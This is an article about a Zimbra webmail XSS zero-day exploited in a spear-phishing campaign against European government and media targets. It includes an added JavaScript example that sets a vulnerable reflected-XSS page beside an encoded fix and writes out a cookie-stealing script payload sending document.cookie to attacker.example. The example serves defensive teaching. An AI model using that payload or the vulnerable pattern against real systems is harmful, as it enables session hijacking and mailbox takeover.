A recently reported zero-day vulnerability in the Zimbra open-source email platform is currently under active exploitation, primarily by a threat actor believed to be associated with China. This exploitation is part of a series of targeted spear-phishing campaigns that began in December 2021.
The cyber operation, referred to as “EmailThief,” has been discussed in detail in a technical report released by cybersecurity firm Volexity. The report indicates that the cross-site scripting (XSS) vulnerability, triggered through a crafted link, allows an attacker to execute arbitrary JavaScript in the context of the victim’s authenticated Zimbra webmail session, which is what makes it dangerous: the script runs with whatever the logged-in user can do.
Volexity has attributed these intrusions, which reportedly commenced on December 14, 2021, to a previously unrecognized hacking group identified as TEMP_HERETIC. The group is specifically targeting European government and media organizations. The vulnerability in question affects the latest open-source version of Zimbra, specifically version 8.8.15.
The cyber-attacks appear to have unfolded in two distinct phases. The initial stage involved reconnaissance and the deployment of emails aimed at monitoring whether victims opened the messages. Following this, a second phase commenced with multiple email waves designed to entice targets into clicking malicious links.
Over two weeks, attackers established 74 unique Outlook.com email accounts to disseminate these messages. The reconnaissance emails featured generic subject lines, including invitations to charity events and airline ticket refunds, to increase their chance of being opened.
Successful exploitation requires the target to open the attacker’s link in a web browser in which they are already logged into the Zimbra webmail client. The link does not have to be opened from the webmail interface itself: it could also arrive in, and be clicked from, a standalone mail application such as Thunderbird or Outlook, which hands the URL to the default browser where the Zimbra session is active.
Once weaponized, the vulnerability could allow attackers to steal the victim’s session cookies, giving them persistent access to the compromised mailbox without needing the password. From there the account could be used to send further phishing to the victim’s contacts, broadening the attack surface, and to socially engineer targets into running additional malware.
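The report does not publish the details of the Zimbra bug, so the following is an added, generic illustration of the pattern the two paragraphs above describe (a reflected XSS reached through a crafted link, followed by cookie theft), not Zimbra’s code and not the actual exploit. The page path, the `q` parameter, the cookie names and the attacker host are all assumed for the example. It shows the unescaped reflection beside the output-encoded fix, and why an `HttpOnly` session cookie is invisible to the injected script’s `document.cookie` read:

```javascript
// Added example, not from the Volexity report or the Zimbra code base.
// All URLs, parameter names and cookie names below are constructed.

// Minimal HTML escaper for text placed inside element content.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// VULNERABLE pattern: a search page that reflects the "q" query parameter
// into the HTML without encoding. Anything in the link lands in the page.
function renderVulnerable(requestUrl) {
  const q = new URL(requestUrl).searchParams.get("q") ?? "";
  return `<h1>Results for ${q}</h1>`;
}

// HARDENED pattern: same page, with the reflected value HTML-encoded,
// so "<script>" arrives in the browser as literal text, not an element.
function renderHardened(requestUrl) {
  const q = new URL(requestUrl).searchParams.get("q") ?? "";
  return `<h1>Results for ${escapeHtml(q)}</h1>`;
}

// The attacker's payload: runs in the webmail origin and ships whatever
// document.cookie exposes to a host the attacker controls (hypothetical).
const payload =
  '<script>new Image().src="https://attacker.example/c?"' +
  '+encodeURIComponent(document.cookie)</script>';

// The link sent in the phishing email (hypothetical webmail host and path).
const maliciousLink =
  "https://webmail.example/h/search?q=" + encodeURIComponent(payload);

// True if the rendered HTML contains an executable <script> element.
function containsScriptElement(html) {
  return /<script\b/i.test(html);
}

// Models what document.cookie would return for a set of Set-Cookie headers:
// browsers hide cookies flagged HttpOnly from script, so a session cookie
// carrying that flag cannot be read (and thus not exfiltrated) this way.
function simulateDocumentCookie(setCookieHeaders) {
  return setCookieHeaders
    .map((h) => h.split(";").map((p) => p.trim()))
    .filter((parts) => !parts.slice(1).some((a) => a.toLowerCase() === "httponly"))
    .map((parts) => parts[0])
    .join("; ");
}

// Constructed cookies for the demonstration: one session token with
// HttpOnly set, one harmless preference cookie without it.
const sampleCookies = [
  "session=abc123; Path=/; Secure; HttpOnly",
  "lang=en; Path=/",
];

console.log("vulnerable page executes script:",
  containsScriptElement(renderVulnerable(maliciousLink)));
console.log("hardened page executes script:",
  containsScriptElement(renderHardened(maliciousLink)));
console.log("what the payload could read:",
  JSON.stringify(simulateDocumentCookie(sampleCookies)));
```

Output encoding removes the injection; the cookie flag limits the blast radius if an injection is missed, which is why both are worth checking when reviewing a webmail deployment. Note that `HttpOnly` does not stop the injected script from acting on the victim’s behalf (reading mail, sending phishing through the session), it only stops the token itself from leaving the browser.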
Volexity noted that while none of the identified infrastructure matches that of previously documented threat groups, the choice of targets and the absence of any financial motive suggest the campaign was run by a Chinese APT actor. At the time of the report no patched build of 8.8.15 was available, so users of the open-source edition were advised to upgrade to version 9.0.0 rather than wait for a fix to the vulnerable 8.8.15 line.